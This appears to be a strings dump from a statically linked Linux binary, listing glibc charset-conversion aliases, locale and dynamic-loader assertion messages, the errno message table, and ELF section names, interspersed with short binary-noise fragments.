irreversible != ((void *)0)
__gconv
outbuf != ((void *)0) && *outbuf != ((void *)0)
gconv_db.c
free_derivation
__gconv_release_step
deriv->steps[cnt].__shlib_handle != ((void *)0)
step->__shlib_handle != ((void *)0)
step->__end_fct == ((void *)0)
gconv_conf.c
elem != ((void *)0)
cwd != ((void *)0)
alias
module
ISO-10646/UCS4/
=INTERNAL->ucs4
=ucs4->INTERNAL
UCS-4LE//
=INTERNAL->ucs4le
=ucs4le->INTERNAL
ISO-10646/UTF8/
=INTERNAL->utf8
=utf8->INTERNAL
ISO-10646/UCS2/
=ucs2->INTERNAL
=INTERNAL->ucs2
ANSI_X3.4-1968//
=ascii->INTERNAL
=INTERNAL->ascii
UNICODEBIG//
=ucs2reverse->INTERNAL
=INTERNAL->ucs2reverse
__gconv_get_path
UCS4//
ISO-10646/UCS4/
UCS-4//
ISO-10646/UCS4/
UCS-4BE//
ISO-10646/UCS4/
CSUCS4//
ISO-10646/UCS4/
ISO-10646//
ISO-10646/UCS4/
10646-1:1993//
ISO-10646/UCS4/
10646-1:1993/UCS4/
ISO-10646/UCS4/
OSF00010104//
ISO-10646/UCS4/
OSF00010105//
ISO-10646/UCS4/
OSF00010106//
ISO-10646/UCS4/
WCHAR_T//
INTERNAL
UTF8//
ISO-10646/UTF8/
UTF-8//
ISO-10646/UTF8/
ISO-IR-193//
ISO-10646/UTF8/
OSF05010001//
ISO-10646/UTF8/
ISO-10646/UTF-8/
ISO-10646/UTF8/
UCS2//
ISO-10646/UCS2/
UCS-2//
ISO-10646/UCS2/
OSF00010100//
ISO-10646/UCS2/
OSF00010101//
ISO-10646/UCS2/
OSF00010102//
ISO-10646/UCS2/
ANSI_X3.4//
ANSI_X3.4-1968//
ISO-IR-6//
ANSI_X3.4-1968//
ANSI_X3.4-1986//
ANSI_X3.4-1968//
ISO_646.IRV:1991//
ANSI_X3.4-1968//
ASCII//
ANSI_X3.4-1968//
ISO646-US//
ANSI_X3.4-1968//
US-ASCII//
ANSI_X3.4-1968//
US//
ANSI_X3.4-1968//
IBM367//
ANSI_X3.4-1968//
CP367//
ANSI_X3.4-1968//
CSASCII//
ANSI_X3.4-1968//
OSF00010020//
ANSI_X3.4-1968//
UNICODELITTLE//
ISO-10646/UCS2/
UCS-2LE//
ISO-10646/UCS2/
UCS-2BE//
UNICODEBIG//
gconv_builtin.c
__gconv_get_builtin_trans
cnt < sizeof (map) / sizeof (map[0])
../iconv/skeleton.c
outbufstart == ((void *)0)
../iconv/loop.c
inend != &bytebuf[4]
inend - inptr <= 7
inend - *inptrp < 4
inend != &bytebuf[6]
outbuf == outerr
gconv_simple.c
*outptrp + 4 > outend
internal_ucs2_loop_single
ucs2_internal_loop_single
utf8_internal_loop_single
internal_utf8_loop_single
internal_ascii_loop_single
ucs4le_internal_loop
inptr - bytebuf > (state->__count & 7)
inend - inptr > (state->__count & ~7)
nstatus == __GCONV_FULL_OUTPUT
__gconv_transform_internal_ucs2reverse
internal_ucs2reverse_loop_single
__gconv_transform_ucs2reverse_internal
ucs2reverse_internal_loop_single
__gconv_transform_internal_ucs2
__gconv_transform_ucs2_internal
__gconv_transform_utf8_internal
__gconv_transform_internal_utf8
__gconv_transform_internal_ascii
__gconv_transform_ascii_internal
__gconv_transform_ucs4le_internal
__gconv_transform_internal_ucs4le
__gconv_transform_ucs4_internal
__gconv_transform_internal_ucs4
gconv_trans_context
gconv_trans
gconv_trans_init
gconv_trans_end
gconv_trans.c
trans->name != ((void *)0)
__gconv_translit_find
GCONV_PATH
/usr/lib32/gconv/gconv-modules.cache
gconv_dl.c
obj->counter > 0
found->handle == ((void *)0)
gconv_init
gconv_end
do_release_shlib
__gconv_find_shlib
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
LC_MESSAGES
LC_PAPER
LC_NAME
LC_ADDRESS
LC_TELEPHONE
LC_MEASUREMENT
LC_IDENTIFICATION
?HP[hw
LOCPATH
LC_ALL
LANG
findlocale.c
locale_codeset != ((void *)0)
/usr/lib/locale
_nl_find_locale
loadlocale.c
category == __LC_CTYPE
_nl_intern_locale_data
cnt < (sizeof (_nl_value_type_LC_NUMERIC) / sizeof (_nl_value_type_LC_NUMERIC[0]))
cnt < (sizeof (_nl_value_type_LC_TIME) / sizeof (_nl_value_type_LC_TIME[0]))
cnt < (sizeof (_nl_value_type_LC_COLLATE) / sizeof (_nl_value_type_LC_COLLATE[0]))
cnt < (sizeof (_nl_value_type_LC_MONETARY) / sizeof (_nl_value_type_LC_MONETARY[0]))
cnt < (sizeof (_nl_value_type_LC_MESSAGES) / sizeof (_nl_value_type_LC_MESSAGES[0]))
cnt < (sizeof (_nl_value_type_LC_PAPER) / sizeof (_nl_value_type_LC_PAPER[0]))
cnt < (sizeof (_nl_value_type_LC_NAME) / sizeof (_nl_value_type_LC_NAME[0]))
cnt < (sizeof (_nl_value_type_LC_ADDRESS) / sizeof (_nl_value_type_LC_ADDRESS[0]))
cnt < (sizeof (_nl_value_type_LC_TELEPHONE) / sizeof (_nl_value_type_LC_TELEPHONE[0]))
cnt < (sizeof (_nl_value_type_LC_MEASUREMENT) / sizeof (_nl_value_type_LC_MEASUREMENT[0]))
cnt < (sizeof (_nl_value_type_LC_IDENTIFICATION) / sizeof (_nl_value_type_LC_IDENTIFICATION[0]))
loadarchive.c
archmapped == &headmap
((((ps) - 1) & (ps)) == 0)
last->next == mapped
ranges[cnt].from >= from
_nl_archive_subfreeres
_nl_load_locale_from_archive
/usr/lib/locale/locale-archive
upper
lower
alpha
digit
xdigit
Tacocat
space
print
graph
blank
cntrl
punct
alnum
toupper
tolower
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
June
July
August
September
October
November
December
%a %b %e %H:%M:%S %Y
%a %b %e %H:%M:%S %Z %Y
libc
ANSI_X3.4-1968
[Am-
kpnJ
uD;s
)r+[
[!|n
uYD?e
I9C-
I!G.
U^h6LU3
U.y`
3?Cy
'_Djz
$po?b
w};u
=t%j
MP0!
t0tv
=u8Q)+
*~xx
~j2=
|;#o
Ac+;
^2XX%
!{>;b
dI@B
2I%%
_IO_vfwprintf
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Name not unique on network
File descriptor in bad state
Remote address changed
Streams pipe error
Too many users
Destination address required
Message too long
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address already in use
Network is down
Network is unreachable
Connection reset by peer
No buffer space available
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
Operation canceled
Required key not available
Key has expired
Key has been revoked
Key was rejected by service
Owner died
State not recoverable
Resource temporarily unavailable
Inappropriate ioctl for device
Numerical argument out of domain
Too many levels of symbolic links
Value too large for defined data type
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Socket operation on non-socket
Protocol wrong type for socket
Address family not supported by protocol
Cannot assign requested address
Network dropped connection on reset
Software caused connection abort
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
iofwide.c
_IO_fwide
../sysdeps/x86_64/cacheinfo.c
offset == 2
! "cannot happen"
intel_check_word
handle_amd
mbsrtowcs_l.c
__mbsrtowcs_l
((wchar_t *) data.__outbuf)[-1] == L'\0'
dl-runtime.c
((reloc->r_info) & 0xff) == 7
_dl_profile_fixup
_dl_fixup
gmon
%s: cannot open file: %s
%s: cannot create file: %s
%s: cannot map file: %s
%s: cannot stat file: %s
%s: file is no correct profile data file for `%s'
Out of memory while initializing profiler
_dl_open_hook
GLIBC_PRIVATE
to_inpunct
vfscanf.c
_IO_vfscanf_internal
cnt < (((uint32_t) (*_nl_current_LC_CTYPE)->values[((int) (_NL_CTYPE_MB_CUR_MAX) & 0xffff)].word))
_dlfcn_hook
%s%s%s
%s%s%s: %s
unsupported dlinfo request
invalid namespace
Unknown error
mbrtowc.c
__mbrtowc
invalid mode for dlopen()
dl-open.c
cannot extend global scope
ns == l->l_ns
mode & 0x00004
cannot create scope list
imap->l_need_tls_init == 0
_dl_open
dl_open_worker
no more namespaces available for dlmopen()
invalid target namespace in dlmopen()
_dl_debug_initialize (0, args.nsid)->r_state == RT_CONSISTENT
_dl_debug_initialize (0, args->nsid)->r_state == RT_CONSISTENT
opening file=%s [%lu]; direct_opencount=%u
TLS generation counter wrapped!  Please report this.
cannot load any more object with static TLS
dl-close.c
! should_be_there
old_map->l_tls_modid == idx
idx == nloaded
imap->l_ns == nsid
calling fini: %s [%lu]
tmap->l_ns == nsid
dlclose
imap->l_type == lt_loaded
map->l_init_called
shared object not open
_dl_close
_dl_close_worker
remove_slotinfo
closing file=%s; direct_opencount=%u
(*lp)->l_idx >= 0 && (*lp)->l_idx < nloaded
jmap->l_idx >= 0 && jmap->l_idx < nloaded
imap->l_type == lt_loaded && (imap->l_flags_1 & 0x00000008) == 0
file=%s [%lu];  destroying link map
TLS generation counter wrapped!  Please report as described in <http://www.debian.org/Bugs/>.
UUUUUUUU
?33333333
UUUUUUU
P^Cy
^B{	$I
inity
;invalid mode parameter
DST not allowed in SUID/SGID programs
cannot load auxiliary `%s' because of empty dynamic string token substitution
empty dynamic string token substitution
load auxiliary object=%s requested by file=%s
load filtered object=%s requested by file=%s
cannot allocate dependency list
map->l_searchlist.r_list == ((void *)0)
cannot allocate symbol search list
Filters not supported with LD_TRACE_PRELINKING
map->l_searchlist.r_list[0] == map
dl-deps.c
cnt <= nlist
_dl_map_object_deps
calling init: %s
calling preinit: %s
dl-fini.c
j < nmaps
i < nloaded
ns != 0 || i == nloaded
_dl_fini
_dl_sort_fini
ns == 0 || i == nloaded || i == nloaded - 1
checking for version `%s' in file %s [%lu] required by file %s [%lu]
no version information available (required by 
cannot allocate version reference table
dl-version.c
def_offset != 0
unsupported version 
 of Verdef record
weak version `
' not found (required by 
 of Verneed record
needed != ((void *)0)
_dl_check_map_versions
match_symbol
RTLD_NEXT used in code not dynamically loaded
zPLR
CAk[S
.shstrtab
.note.ABI-tag
.rel.plt
.init
.text
__libc_freeres_fn
.fini
.rodata
__libc_atexit
__libc_subfreeres
.eh_frame
.gcc_except_table
.tdata
.tbss
.ctors
.dtors
.jcr
.data.rel.ro
.got
.got.plt
.data
.bss
__libc_freeres_ptrs
